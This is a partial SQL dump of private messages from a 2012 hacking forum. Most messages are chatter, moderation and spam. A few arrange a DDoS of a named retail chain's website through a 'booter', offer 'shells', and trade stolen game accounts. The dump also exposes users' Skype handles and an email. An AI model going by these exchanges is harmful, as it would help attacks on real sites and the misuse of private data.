'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: skype api', '0', '\'m doing that now. I have no idea how Ill find it but meh. Ill give it a shot.', '1347737322', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1768', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: skype api', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n\'m doing that now. I have no idea how Ill find it but meh. Ill give it a shot.\r\n[/quote]\r\n\r\nLol \r\n\r\nThe site is http://skyperesolver.info/login.php\r\n\r\nAlso, issue a SPAM Warning to iTzIpod. \r\n[/quote]\r\nI can\'t get anything from that site.', '1347737793', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1771', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: skype api', '0', 'I have an account I need to pay to actually get o the skype resolver page\r\nand from the resolver page I might be able to grab there API from the page source code. But i\'m not paying 2$ just on a chance I might be able to get it.', '1347738126', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1791', '55', '1', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Baws\']\r\n[quote=\'t3h jok3r\']\r\nSup man long time no see. \r\n[/quote]\r\n\r\nschool homework girls\r\n\r\nyea yea yea, how you been sorry for inactivity \r\n[/quote]\r\n\r\nLol same and it\'s cool. Actually not just school, homework and girls there\'s more with me.\r\n\r\n- Hospital\r\n- Social Engineering\r\n- LH maintenance and advertising\r\n\r\n[/quote]\r\n\r\nYea that\'s too much work.\r\nWhat\'s with the hospital?', '1347747756', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1796', '55', '1', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Baws\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Baws\']\r\n[quote=\'t3h jok3r\']\r\nSup man long time no see. \r\n[/quote]\r\n\r\nschool homework girls\r\n\r\nyea yea yea, how you been sorry for inactivity \r\n[/quote]\r\n\r\nLol same and it\'s cool. Actually not just school, homework and girls there\'s more with me.\r\n\r\n- Hospital\r\n- Social Engineering\r\n- LH maintenance and advertising\r\n\r\n[/quote]\r\n\r\nYea that\'s too much work.\r\nWhat\'s with the hospital?\r\n[/quote]\r\n\r\nI have a rib cage injury because I was in a car rack, I slipped and fell two weeks ago so all the ribs that were healed, opened up again.\r\n[/quote]\r\n\r\nDamn that sucks, hope you get better.\r\n\r\nJunior year in Cali is shitload of work, first 2 days and I gotta essay. ', '1347747893', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1807', '55', '1', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Baws\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Baws\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Baws\']\r\n[quote=\'t3h jok3r\']\r\nSup man long time no see. \r\n[/quote]\r\n\r\nschool homework girls\r\n\r\nyea yea yea, how you been sorry for inactivity \r\n[/quote]\r\n\r\nLol same and it\'s cool. Actually not just school, homework and girls there\'s more with me.\r\n\r\n- Hospital\r\n- Social Engineering\r\n- LH maintenance and advertising\r\n\r\n[/quote]\r\n\r\nYea that\'s too much work.\r\nWhat\'s with the hospital?\r\n[/quote]\r\n\r\nI have a rib cage injury because I was in a car rack, I slipped and fell two weeks ago so all the ribs that were healed, opened up again.\r\n[/quote]\r\n\r\nDamn that sucks, hope you get better.\r\n\r\nJunior year in Cali is shitload of work, first 2 days and I gotta essay. \r\n[/quote]\r\n\r\nThanks, fucking sucks. When is it due? \r\n[/quote]\r\n\r\nYou\'re always assigned an essay a week before it\'s due, so it\'s like on Monday :L', '1347748361', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1812', '55', '1', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Baws\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Baws\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Baws\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Baws\']\r\n[quote=\'t3h jok3r\']\r\nSup man long time no see. \r\n[/quote]\r\n\r\nschool homework girls\r\n\r\nyea yea yea, how you been sorry for inactivity \r\n[/quote]\r\n\r\nLol same and it\'s cool. Actually not just school, homework and girls there\'s more with me.\r\n\r\n- Hospital\r\n- Social Engineering\r\n- LH maintenance and advertising\r\n\r\n[/quote]\r\n\r\nYea that\'s too much work.\r\nWhat\'s with the hospital?\r\n[/quote]\r\n\r\nI have a rib cage injury because I was in a car rack, I slipped and fell two weeks ago so all the ribs that were healed, opened up again.\r\n[/quote]\r\n\r\nDamn that sucks, hope you get better.\r\n\r\nJunior year in Cali is shitload of work, first 2 days and I gotta essay. \r\n[/quote]\r\n\r\nThanks, fucking sucks. When is it due? \r\n[/quote]\r\n\r\nYou\'re always assigned an essay a week before it\'s due, so it\'s like on Monday :L\r\n[/quote]\r\nAren\'t you guys off on Monday and Tuesday? \r\n[/quote]\r\n\r\nNope...We get Saturday and Sunday off. \r\nWhere do you live again?', '1347748881', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1815', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: E-book', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\ndo you want a vouch copy of my e-book? xD\r\nLink: http://www.mediafire.com/?occs2rh1zx2241d\r\nPassword: l33t\r\nthanks\r\n[/quote]\r\n\r\nThanks, I will post my review soon. \r\n[/quote]\r\nThanks a lot for your review. It was my first e-book :S\r\n\r\n[/quote]\r\n\r\n:) Thanks. Well I read lots of E-Books. So I kinda knew how to make one.\r\n\r\nOh wow, I thought it was like your 5th or something because the explanations, images and introduction were kinda professional. \r\n[/quote]', '1347782618', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1817', '67', '100', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Re: Vouch Ddos', '0', '[quote=\'GRONgamer61\']\r\n[quote=\'HoverCatz\']\r\nHey. Take down www.ica.no as a test. MSG Me 30 mins before you do it, and msg me 1 min before you do it please.\r\n[/quote]\r\n\r\nThat\'s a huge chain company??\r\n[/quote]\r\n\r\nAre you attacking from your home internet? Its not dangerous attacking it from a booter', '1347792179', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1824', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Read', '0', 'What\'s ibooter.org? ', '1347804796', '0', '3', '1347896001', '1', '0', '2', '1347895983'); INSERT INTO mybb_privatemessages VALUES('1860', '193', '1', '193', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hai', '0', 'are u from l33thakcers.com\r\nbcoz its looks sililar likes it u done a good job', '1347894849', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1862', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\']\r\nWhat\'s ibooter.org? \r\n[/quote]\r\n\r\nMy private booter :)', '1347896001', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1879', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'read', '0', 'I love every single one you made. ... Now I have to pick which one I like the most.', '1347935296', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1883', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: read', '0', '[quote=\'iTzIpod\']\r\n[quote=\'NXK\']\r\nI love every single one you made. ... Now I have to pick which one I like the most.\r\n[/quote]\r\n\r\nHow... They\'re all ugly :/\r\n[/quote]\r\nThe first one is amazing, It\'s so perfect and classic. Ill be using this one for sure.', '1347935417', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1887', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: read', '0', 'It\'s amazing ', '1347936066', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1902', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help', '0', '[quote=\'t3h jok3r\']\r\nRecently my PC broke down so I wont be able to log on long because I will log on my sisters PC. I\'m not sure by when I will get my new laptop but I\'m sure it will be around a week.\r\n\r\nPlease try to keep LH active and please search for spam and take immediate action. \r\n[/quote]\r\nWill do man:)', '1348024944', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1904', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help', '0', '[quote=\'t3h jok3r\']\r\nRecently my PC broke down so I wont be able to log on long because I will log on my sisters PC. I\'m not sure by when I will get my new laptop but I\'m sure it will be around a week.\r\n\r\nPlease try to keep LH active and please search for spam and take immediate action. \r\n[/quote]\r\n\r\nOkay sounds good.', '1348053237', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1917', '194', '82', '194', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\']\r\nYou seem cool\r\n\r\nIf you want, add me on Skype. Skype: iTzIpod\r\n\r\nIf you maintain these HQ posts, (Keep posting your HQ posts) I will invite you to Unique.\r\n\r\nWhat is Unique?\r\n\r\nUnique is a Usergroup that I own. It\'s like a 1 time offer. You can either accept, or decline. We have leaks, tutorials, programs, etc.\r\n[/quote]\r\n\r\nSounds good. Also I\'ll add you to skype. Thanks for the opportunity. :) ', '1348107046', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1943', '194', '82', '194', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\']\r\n[quote=\'Slender Man\']\r\n[quote=\'iTzIpod\']\r\nYou seem cool\r\n\r\nIf you want, add me on Skype. Skype: iTzIpod\r\n\r\nIf you maintain these HQ posts, (Keep posting your HQ posts) I will invite you to Unique.\r\n\r\nWhat is Unique?\r\n\r\nUnique is a Usergroup that I own. It\'s like a 1 time offer. You can either accept, or decline. We have leaks, tutorials, programs, etc.\r\n[/quote]\r\n\r\nSounds good. Also I\'ll add you to skype. Thanks for the opportunity. :) \r\n[/quote]\r\n\r\nNah man, thank you. Because of you, I now have 1 new friend :3\r\n[/quote]\r\n\r\n:cool: I don\'t know if I added the right person.. My Skype is theslendermann.', '1348108050', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1953', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Shells', '0', '[quote=\'iTzIpod\']\r\nHey I got some Shells. Where/Which section can I release them in?\r\n[/quote]\r\nBotnets section\r\n\r\nEven though they\'re not for ddosing but yeah. Anything internet stress test related there for now.', '1348182781', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1957', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Ads', '0', 'Why dont you want company ads? Well yeah this is my only question :P\r\nThanks', '1348257713', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1960', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ads', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\nWhy dont you want company ads? Well yeah this is my only question :P\r\nThanks\r\n[/quote]\r\n\r\nSorry, I can\'t answer that. It\'s due to some security reasons. \r\n[/quote]\r\nLol. In a thread you said if someone wants to know why you dont want company ads he can ask you over pm.\r\n', '1348299273', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1962', '53', '5', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Hallo', '0', 'Timmy bist du deutsch?\r\nIch bin Schweizer also spreche ich auch Deutsch\r\n', '1348326563', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1966', '172', '82', '172', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\']\r\nI invited you into Unique. Please be Unique and wear the Userbar. :D Please be active or try to be active and post a lot outside and inside Unique. \r\nThanks.\r\n\r\n- iTzIpod.\r\n\r\n\r\nNote: I have your MistaCode\'s PPD Method eBook. :D GetTheCode from HF.\r\n\r\nI didn\'t buy it. \r\n[/quote]\r\n\r\nThat\'s v1 and v2 has been released. And soon I am done with v3 :D\r\nAnd yeah y got it from Leakforums didn\'t ya ? ;)', '1348331922', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1987', '53', '5', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Hallo', '0', '[quote=\'Timmy\']\r\n[quote=\'sirchamp\']\r\nTimmy bist du deutsch?\r\nIch bin Schweizer also spreche ich auch Deutsch\r\n\r\n[/quote]\r\n\r\nVery good. JK I have no idea what you are on about.\r\n[/quote]\r\n\r\nOh fuck. I tought you were german.\r\nSorry', '1348499363', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2034', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Do me a favor', '0', '[quote=\'t3h jok3r\']\r\nKeep an eye on mr407. If he views a lot of threads and posts no replies or views a lot of member profiles or sends more than 2 PMs then ban him immediately. \r\n[/quote]\r\nWill do, why whats wrong with him?', '1348542427', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2038', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Do me a favor', '0', 'Alright aha.', '1348542702', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2556', '243', '53', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349619883', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2595', '100', '199', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"199\";}}', '2', 'iTziPod needs your help ASAP!', '0', 'Alright so iPod caught a RAT, he would be PM\'ing you now, but hes having some difficulties. Could you add his skype? itzipod is the username I was hoping you could help him remove the RAT. Thanks!', '1349645633', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3000', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Yo', '0', '[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? ', '1350092228', '0', '3', '1350092550', '1', '0', '0', '1350092502'); INSERT INTO mybb_privatemessages VALUES('3001', '228', '228', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: GIVEAWAY CONTEST', '0', '[quote=\'VirtualLegend\']\r\nHi,\r\n\r\nI have a new Thread about a Huge GIVEAWAY. I want that everyone is involved in the Contest, so thats why I\'m asking you can you PM everyone to go to my contest i will be glad if you do it and you will receive the Huge Ultimate Pack too.\r\n\r\nThread: http://l33thacking.net/thread-822.html\r\n\r\nBye,\r\n[/quote]\r\n\r\nI can\'t do a mass PM because if I do it for one person then everyone will ask me to mass PM others then it will get annoying to see spammed by PM but I can sticky the thread for you if you would like.', '1350092351', '0', '3', '1350094424', '1', '0', '0', '1350094355'); INSERT INTO mybb_privatemessages VALUES('2553', '243', '3', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349619837', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2551', '100', '82', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Mc accounts', '0', 'Can i have some minecraft accounts?(:', '1349614994', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2550', '82', '82', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Mc accounts', '0', 'Can i have some minecraft accounts?(:', '1349614994', '0', '1', '0', '1', '0', '2', '1349620274'); INSERT INTO mybb_privatemessages VALUES('2075', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\']\r\n[quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\']\r\nAwesome about the rewards. I get to give them xD and ya it sucked that we were down.\r\n[/quote]\r\n\r\nCan you atleast attempt to use proper grammer?\r\n\r\nYou\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times.\r\n[/quote]\r\n\r\n\r\nI agree man, can you please fix the grammar in posting?\r\n[/quote]\r\n\r\nSure!', '1348690502', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2611', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Unique', '0', 'I was wondering are you interested in becoming the new leader of the Unique group?', '1349652447', '0', '3', '1349685160', '1', '0', '0', '1349656503'); INSERT INTO mybb_privatemessages VALUES('2084', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Posting', '0', '[quote=\'t3h jok3r\']\r\nThis PM has been sent to multiple people.\r\n\r\nSup guys, I was wondering if you guys could pick up your activity a little more. Which means please post more and do you know any computing or coding website? \r\n[/quote]\r\n\r\nI post daily.\r\n\r\nand yeah freelancer.com is a good one.', '1348710501', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3758', '61', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\nWhen is my group Marketers officel on LH?\r\n[/quote]\r\n\r\nWhen you find a different userbar. Contact reloadzor he may be interested in making you one.', '1350940459', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3759', '61', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Hello', '0', '[quote=\'NXK\']\r\n[quote=\'VirtualLegend\']\r\nWhen is my group Marketers officel on LH?\r\n[/quote]\r\n\r\nWhen you find a different userbar. Contact reloadzor he may be interested in making you one.\r\n[/quote]\r\n\r\nI have already updated my userbar Check it out', '1350940563', '0', '3', '1350940619', '1', '0', '2', '1350940577'); INSERT INTO mybb_privatemessages VALUES('2596', '199', '199', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"199\";}}', '1', 'oh and also', '0', 'if he randomly says FUCK YOU BITCH thats not actually him talking.', '1349645681', '0', '1', '0', '1', '0', '2', '1349674337'); INSERT INTO mybb_privatemessages VALUES('2597', '100', '199', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"199\";}}', '2', 'oh and also', '0', 'if he randomly says FUCK YOU BITCH thats not actually him talking.', '1349645681', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2599', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Contact', '0', 'If you do plan on reneging on your deal, could we talk on MSN?', '1349647535', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2583', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Selling LH', '0', '[quote=\'t3h jok3r\']\r\nI\'m done with LH, I want to sell it. Do you have Skype or MSN?\r\n[/quote]\r\n\r\nI do.\r\nEmail: Unverified@hotmail.com', '1349631686', '0', '3', '1349633088', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2586', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Selling LH', '0', '[quote=\'The Anarchist\']\r\n[quote=\'t3h jok3r\']\r\nI\'m done with LH, I want to sell it. Do you have Skype or MSN?\r\n[/quote]\r\n\r\nI do.\r\nEmail: Unverified@hotmail.com\r\n[/quote]\r\n\r\nI also have Skype: TheAnarchistAF', '1349633088', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2710', '62', '62', '203', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: i need you PLZ', '0', '[quote=\'R?????zo?\']\r\n[quote=\'NeonLights\']\r\ni was wondering if u could make me a userbard similar to this one:\r\n[img]http://imageshack.us/a/img802/7561/ratters.gif[/img]\r\nbut make the ratters green,red,yellow\r\n:D\r\nif its prossible plz i really need this for my group to work out il give u a spot if u want :)\r\n\r\nplz reply soon\r\n[/quote]\r\nyou need this quick, im abit busy with my gf atm.\r\n[/quote]\r\n\r\n:( ok ', '1349728367', '0', '1', '0', '1', '0', '2', '1349728544'); INSERT INTO mybb_privatemessages VALUES('2588', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Selling LH', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'The Anarchist\']\r\n[quote=\'t3h jok3r\']\r\nI\'m done with LH, I want to sell it. Do you have Skype or MSN?\r\n[/quote]\r\n\r\nI do.\r\nEmail: Unverified@hotmail.com\r\n[/quote]\r\n\r\nDo you have Skype?\r\n[/quote]\r\n\r\nTheAnarchistAF\r\nI am not sure if my PMs are going through', '1349633122', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3756', '228', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Hello', '0', 'When is my group Marketers officel on LH?', '1350940404', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3757', '228', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\nWhen is my group Marketers officel on LH?\r\n[/quote]\r\n\r\nWhen you find a different userbar. Contact reloadzor he may be interested in making you one.', '1350940459', '0', '3', '1350940563', '1', '0', '2', '1350940538'); INSERT INTO mybb_privatemessages VALUES('2580', '61', '53', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Accepted', '0', 'You have been accepted into gamers, Please be patient while we gather more members. Than we will start to post alot of content things like that.', '1349627431', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2572', '243', '9', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"9\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349620057', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2574', '243', '100', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Anarchy Forums', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested.', '1349620088', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2576', '243', '205', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349620106', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2714', '240', '1', '240', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Checking out LH?', '0', '[quote=\'t3h jok3r\']\r\n1. Moderator at Anarchy forums.\r\n2. After \"stalking\" you on my board, I have noticed that you are going through my members profiles for the past 30 mins.\r\n3. I\'m requesting you nicely to either leave or stay on L33THacking and be HQ + Active.\r\n\r\nIf you spam, continue to view profiles, send messages violating our rules and regulations or DDoS LH then they will be consequences. Therefore, I\'m sending this PM to warn you and once again either leave LH or stay here and be HQ + Active. \r\n[/quote]\r\n\r\nHello t3h jok3r,\r\n\r\nLet\'s not bring AnarchyForums Moderator Status into this conversation - it\'s not needed. You may think it \'sucks\', but that\'s your opinion.\r\n\r\nI\'ve been browsing through your site just observing if it was a place for me to stay - it looks quite good.\r\n\r\nI\'m not spamming (haven\'t made a single post), I\'m not sure what\'s wrong with viewing profiles & I am in no way sending any messages violating your rules. And I can assure you no one on AF was ddosing your site - that was nothing to do with us.', '1349728582', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2578', '100', '243', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"227\";}}', '2', 'Re: Anarchy Forums', '0', '[quote=\'Slenderman\']\r\nHey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested.\r\n[/quote]\r\n\r\nFucker, go away stop advertising on LH ', '1349623173', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2579', '53', '53', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Accepted', '0', 'You have been accepted into gamers, Please be patient while we gather more members. Than we will start to post alot of content things like that.', '1349627431', '0', '1', '0', '1', '0', '2', '1349637252'); INSERT INTO mybb_privatemessages VALUES('2570', '243', '62', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Anarchy Forums', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested.', '1349620052', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2558', '243', '213', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"213\";}}', '2', 'Anarchy Forums', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested.', '1349619906', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2594', '199', '199', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"199\";}}', '1', 'iTziPod needs your help ASAP!', '0', 'Alright so iPod caught a RAT, he would be PM\'ing you now, but hes having some difficulties. Could you add his skype? itzipod is the username I was hoping you could help him remove the RAT. Thanks!', '1349645633', '0', '1', '0', '1', '0', '2', '1349674348'); INSERT INTO mybb_privatemessages VALUES('2560', '243', '4', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"4\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349619940', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2562', '243', '5', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Anarchy Forums', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested.', '1349619976', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2564', '243', '203', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349619986', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2566', '243', '82', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Anarchy Forums', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested.', '1349620009', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2568', '243', '55', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"55\";}}', '2', 'Forum', '0', 'Hey there, just wanted to let you know about another awesome hacking forum (http://www.anarchyforums.net) - feel free to check us out if you\'re interested', '1349620025', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2640', '222', '1', '222', 